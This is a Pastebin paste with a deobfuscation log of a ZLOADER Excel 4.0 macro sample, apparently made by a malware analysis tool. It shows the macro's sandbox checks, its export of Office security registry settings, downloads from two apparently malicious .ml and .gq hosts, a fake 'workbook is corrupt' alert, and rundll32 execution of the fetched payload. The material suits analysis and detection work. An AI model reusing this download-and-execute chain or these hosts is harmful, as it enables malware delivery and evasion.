API tools faq
paste
Advertisement
dissectmalware

Deobfuscation of ZLOADER XLM - MID

dissectmalware
May 20th, 2020
367
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.65 KB | None | 0 0
raw download clone embed print report
  1. 1c6a12ed08fe4c992fa7231da6cacd6c47e85a4e5528d37245bd4918bab65221
  2. [Loading Cells]
  3. auto_open: auto_open->sr9LnXwuMXhdEV1etstdVUUIDDAzaS!$BI$51150
  4. [Starting Deobfuscation]
  5. CELL:BI51150 , FullEvaluation ,SET.VALUE(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EC46730," !""#$%&'()*+,-./01")
  6. CELL:BI51151 , FullEvaluation ,RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!FC46084)
  7. CELL:FC46084 , FullEvaluation ,SET.VALUE(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EI21975,"23456789:;<=>?@ABCD")
  8. CELL:FC46085 , FullEvaluation ,GOTO(AU32978)
  9. CELL:AU32978 , FullEvaluation ,SET.VALUE(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EI41531,"EFGHIJKLMNOPQRSTUVW")
  10. CELL:AU32979 , FullEvaluation ,RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!IJ61690)
  11. CELL:IJ61690 , FullEvaluation ,SET.VALUE(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!GU59994,"XYZ[\]^_`abcdefghij")
  12. CELL:IJ61691 , FullEvaluation ,GOTO(FH5374)
  13. CELL:FH5374 , FullEvaluation ,SET.VALUE(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EC14253,"klmnopqrstuvwxyz{|}")
  14. CELL:FH5375 , FullEvaluation ,RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!DL62598)
  15. CELL:DL62598 , FullEvaluation ,FORMULA("=CLOSE(FALSE)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!GF55703)
  16. CELL:DL62599 , FullEvaluation ,GOTO(DW30713)
  17. CELL:DW30713 , FullEvaluation ,FORMULA("=APP.MAXIMIZE()",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!DW30714)
  18. CELL:DW30714 , NotImplemented ,APP.MAXIMIZE()
  19. CELL:DW30715 , FullEvaluation ,RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!DI26418)
  20. CELL:DI26418 , FullEvaluation ,FORMULA("=IF(GET.WINDOW(7),GOTO(R[29284]C[75]),)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!DI26419)
  21. CELL:DI26419 , FullEvaluation ,IF(GET.WINDOW(7),GOTO(R[29284]C[75]),)
  22. CELL:DI26420 , FullEvaluation , GOTO(EY25119)
  23. CELL:EY25119 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[30583]C[33]))",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EY25120)
  24. CELL:EY25120 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[30583]C[33]))
  25. CELL:EY25121 , FullEvaluation , GOTO(DM24775)
  26. CELL:DM24775 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[30927]C[71]),)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!DM24776)
  27. CELL:DM24776 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[30927]C[71]),)
  28. CELL:DM24777 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!BB54653)
  29. CELL:BB54653 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[1049]C[134]),)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!BB54654)
  30. CELL:BB54654 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[1049]C[134]),)
  31. CELL:BB54655 , FullEvaluation , GOTO(DM47887)
  32. CELL:DM47887 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[7815]C[71]),)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!DM47888)
  33. CELL:DM47888 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[7815]C[71]),)
  34. CELL:DM47888 , FullEvaluation , [TRUE] GOTO(R[7815]C[71])
  35. CELL:GF55703 , End , CLOSE(FALSE)
  36. CELL:DM47888 , FullEvaluation , [FALSE]
  37. CELL:DM47889 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!ID20444)
  38. CELL:ID20444 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[35258]C[-50]),)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!ID20445)
  39. CELL:ID20445 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[35258]C[-50]),)
  40. CELL:ID20445 , FullEvaluation , [TRUE] GOTO(R[35258]C[-50])
  41. CELL:GF55703 , End , CLOSE(FALSE)
  42. CELL:ID20445 , FullEvaluation , [FALSE]
  43. CELL:ID20446 , FullEvaluation , GOTO(IO50243)
  44. CELL:IO50243 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[5459]C[-61]))",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!IO50244)
  45. CELL:IO50244 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[5459]C[-61]))
  46. CELL:IO50245 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!CP61633)
  47. CELL:CP61633 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-5931]C[94]))",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!CP61634)
  48. CELL:CP61634 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-5931]C[94]))
  49. CELL:CP61635 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EZ50234)
  50. CELL:EZ50234 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[5468]C[32]))",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EZ50235)
  51. CELL:EZ50235 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[5468]C[32]))
  52. CELL:EZ50236 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EE6990)
  53. CELL:EE6990 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!BE62553)
  54. CELL:EE6991 , FullEvaluation , GOTO(EK8139)
  55. CELL:EK8139 , FullEvaluation , FORMULA("=""C:\Users\Public\p6cm.reg""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!FP15119)
  56. CELL:EK8140 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!AN62515)
  57. CELL:AN62515 , FullEvaluation , FORMULA("=R[2318]C[0]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-45116]C[115]&"" /y""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!BE60235)
  58. CELL:AN62516 , FullEvaluation , GOTO(HF55584)
  59. CELL:HF55584 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!DD24409)
  60. CELL:HF55585 , FullEvaluation , GOTO(EF34363)
  61. CELL:EF34363 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-9955]C[-28],R[25871]C[-79],0,5)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EF34364)
  62. CELL:EF34364 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",EF36682GET.WORKSPACE(2)\Excel\Security IQ-10752 /y,0,5)
  63. CELL:EF34365 , FullEvaluation , GOTO(AY41480)
  64. CELL:AY41480 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-26364]C[121])))",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!AY41483)
  65. CELL:AY41481 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!AY41484)
  66. CELL:AY41482 , FullEvaluation , FORMULA("=NEXT()",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!AY41485)
  67. CELL:AY41483 , PartialEvaluation , WHILE("C:\Users\Public\p6cm.reg")
  68. CELL:AY41484 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  69. CELL:AY41485 , PartialEvaluation , NEXT()
  70. CELL:AY41486 , FullEvaluation , GOTO(BL42701)
  71. CELL:BL42701 , FullEvaluation , FORMULA("=FOPEN(R[-27583]C[108])",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!BL42702)
  72. CELL:BL42702 , PartialEvaluation , FOPEN("C:\Users\Public\p6cm.reg")
  73. CELL:BL42703 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!IJ50688)
  74. CELL:IJ50688 , FullEvaluation , FORMULA("=FPOS(R[-7987]C[-180],215)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!IJ50689)
  75. CELL:IJ50689 , PartialEvaluation , FPOS("""C:\Users\Public\p6cm.reg""",215)
  76. CELL:IJ50690 , FullEvaluation , GOTO(DN3574)
  77. CELL:DN3574 , FullEvaluation , FORMULA("=FREAD(R[39127]C[-54],255)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!DN3575)
  78. CELL:DN3575 , PartialEvaluation , FREAD("""C:\Users\Public\p6cm.reg""",255)
  79. CELL:DN3576 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!GP432)
  80. CELL:GP432 , FullEvaluation , FORMULA("=FCLOSE(R[42269]C[-134])",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!GP433)
  81. CELL:GP433 , PartialEvaluation , FCLOSE("""C:\Users\Public\p6cm.reg""")
  82. CELL:GP434 , FullEvaluation , GOTO(AL22751)
  83. CELL:AL22751 , FullEvaluation , FORMULA("=FILE.DELETE(R[-7633]C[134])",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!AL22752)
  84. CELL:AL22752 , NotImplemented , FILE.DELETE(R[-7633]C[134])
  85. CELL:AL22753 , FullEvaluation , GOTO(FT22266)
  86. CELL:FT22266 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-18692]C[-58])),GOTO(R[33436]C[12]),)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!FT22267)
  87. CELL:FT22267 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-18692]C[-58])),GOTO(R[33436]C[12]),)
  88. CELL:FT22268 , FullEvaluation , GOTO(CQ28789)
  89. CELL:CQ28789 , FullEvaluation , FORMULA("=""C:\Users\Public\pyq0G.html""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!GO48182)
  90. CELL:CQ28790 , FullEvaluation , GOTO(AP48736)
  91. CELL:AP48736 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!GC52670)
  92. CELL:AP48737 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!BC22083)
  93. CELL:BC22083 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[30586]C[130],R[26098]C[142],0,0)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!BC22084)
  94. CELL:BC22084 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\pyq0G.html",0,0)
  95. CELL:BC22085 , FullEvaluation , GOTO(Z64124)
  96. CELL:Z64124 , FullEvaluation , FORMULA("=FILES(R[-15943]C[171])",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!Z64125)
  97. CELL:Z64125 , PartialEvaluation , FILES("C:\Users\Public\pyq0G.html")
  98. CELL:Z64126 , FullEvaluation , GOTO(GB21989)
  99. CELL:GB21989 , FullEvaluation , FORMULA("=IF(ISERROR(R[42135]C[-158]),GOTO(R[33713]C[4]),)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!GB21990)
  100. CELL:GB21990 , FullBranching , IF(ISERROR(R[42135]C[-158]),GOTO(R[33713]C[4]),)
  101. CELL:GB21990 , FullEvaluation , [TRUE] GOTO(R[33713]C[4])
  102. CELL:GF55703 , End , CLOSE(FALSE)
  103. CELL:GB21990 , FullEvaluation , [FALSE]
  104. CELL:GB21991 , FullEvaluation , GOTO(CN14672)
  105. CELL:CN14672 , FullEvaluation , SET.VALUE(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EU11377,"klmnopqrstuvwxyz{|}")
  106. CELL:CN14673 , FullEvaluation , GOTO(BW49797)
  107. CELL:BW49797 , FullEvaluation , SET.VALUE(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!GK50993,"XYZ[\]^_`abcdefghij")
  108. CELL:BW49798 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!CO25998)
  109. CELL:CO25998 , FullEvaluation , SET.VALUE(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!CY8498,"EFGHIJKLMNOPQRSTUVW")
  110. CELL:CO25999 , FullEvaluation , GOTO(Q10571)
  111. CELL:Q10571 , FullEvaluation , SET.VALUE(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EM449,"23456789:;<=>?@ABCD")
  112. CELL:Q10572 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!CW51990)
  113. CELL:CW51990 , FullEvaluation , SET.VALUE(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!ES17399," !""#$%&'()*+,-./01")
  114. CELL:CW51991 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EG47280)
  115. CELL:EG47280 , FullEvaluation , FORMULA("=""C:\Users\Public\yP8ymPT4.html""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EY6981)
  116. CELL:EG47281 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!V59049)
  117. CELL:V59049 , FullEvaluation , FORMULA("=""https://raitihoupaput.ml/wp-keys.php""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!CA2104)
  118. CELL:V59050 , FullEvaluation , GOTO(HB58625)
  119. CELL:HB58625 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-12328]C[-131],R[-7451]C[-55],0,0)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!HB14432)
  120. CELL:HB58626 , FullEvaluation , GOTO(IG42038)
  121. CELL:IG42038 , FullEvaluation , FORMULA("=FILES(R[-46693]C[-15])",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!FN53674)
  122. CELL:IG42039 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!FF63861)
  123. CELL:FF63861 , FullEvaluation , FORMULA("=IF(ISERROR(R[47960]C[163]),,RUN(R[22723]C[202]))",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!G5714)
  124. CELL:FF63862 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!GN52437)
  125. CELL:GN52437 , FullEvaluation , FORMULA("=""https://feeecomcoispan.gq/wp-keys.php""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!GE61770)
  126. CELL:GN52438 , FullEvaluation , GOTO(CO10201)
  127. CELL:CO10201 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[19492]C[96],R[-35297]C[64],0,0)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!CM42278)
  128. CELL:CO10202 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!FJ15177)
  129. CELL:FJ15177 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!BJ48670)
  130. CELL:FJ15178 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!CG31755)
  131. CELL:CG31755 , FullEvaluation , FORMULA("=ALERT(R[20233]C[-147])",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!HA28437)
  132. CELL:CG31756 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!BC48052)
  133. CELL:BC48052 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EM44523)
  134. CELL:BC48053 , FullEvaluation , GOTO(BG1795)
  135. CELL:BG1795 , FullEvaluation , FORMULA("=R[-45125]C[117]&"",DllRegisterServer""",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!AL52106)
  136. CELL:BG1796 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EY6101)
  137. CELL:EY6101 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-527]C[64],R[7056]C[-41],0,5)",sr9LnXwuMXhdEV1etstdVUUIDDAzaS!CA45050)
  138. CELL:EY6102 , FullEvaluation , GOTO(HB14432)
  139. CELL:HB14432 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://raitihoupaput.ml/wp-keys.php","C:\Users\Public\yP8ymPT4.html",0,0)
  140. CELL:HB14433 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!FN53674)
  141. CELL:FN53674 , PartialEvaluation , FILES("C:\Users\Public\yP8ymPT4.html")
  142. CELL:FN53675 , FullEvaluation , GOTO(G5714)
  143. CELL:G5714 , FullBranching , IF(ISERROR(R[47960]C[163]),,RUN(R[22723]C[202]))
  144. CELL:G5714 , FullEvaluation , [TRUE]
  145. CELL:G5715 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!GE61770)
  146. CELL:GE61770 , FullEvaluation , "https://feeecomcoispan.gq/wp-keys.php"
  147. CELL:GE61771 , FullEvaluation , GOTO(CM42278)
  148. CELL:CM42278 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://feeecomcoispan.gq/wp-keys.php""","C:\Users\Public\yP8ymPT4.html",0,0)
  149. CELL:CM42279 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!BJ48670)
  150. CELL:BJ48670 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  151. CELL:BJ48671 , FullEvaluation , GOTO(HA28437)
  152. CELL:HA28437 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
  153. CELL:HA28438 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EM44523)
  154. CELL:EM44523 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  155. CELL:EM44524 , FullEvaluation , GOTO(AL52106)
  156. CELL:AL52106 , FullEvaluation , C:\Users\Public\yP8ymPT4.html,DllRegisterServer
  157. CELL:AL52107 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!CA45050)
  158. CELL:CA45050 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\yP8ymPT4.html,DllRegisterServer",0,5)
  159. CELL:CA45051 , FullEvaluation , GOTO(GF55703)
  160. CELL:GF55703 , End , CLOSE(FALSE)
  161. CELL:G5714 , FullEvaluation , [FALSE] RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!HA28437)
  162. CELL:HA28437 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  163. CELL:HA28438 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!EM44523)
  164. CELL:EM44523 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  165. CELL:EM44524 , FullEvaluation , GOTO(AL52106)
  166. CELL:AL52106 , FullEvaluation , C:\Users\Public\yP8ymPT4.html,DllRegisterServer
  167. CELL:AL52107 , FullEvaluation , RUN(sr9LnXwuMXhdEV1etstdVUUIDDAzaS!CA45050)
  168. CELL:CA45050 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\yP8ymPT4.html,DllRegisterServer",0,5)
  169. CELL:CA45051 , FullEvaluation , GOTO(GF55703)
  170. CELL:GF55703 , End , CLOSE(FALSE)
  171. time elapsed: 5.668653726577759
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!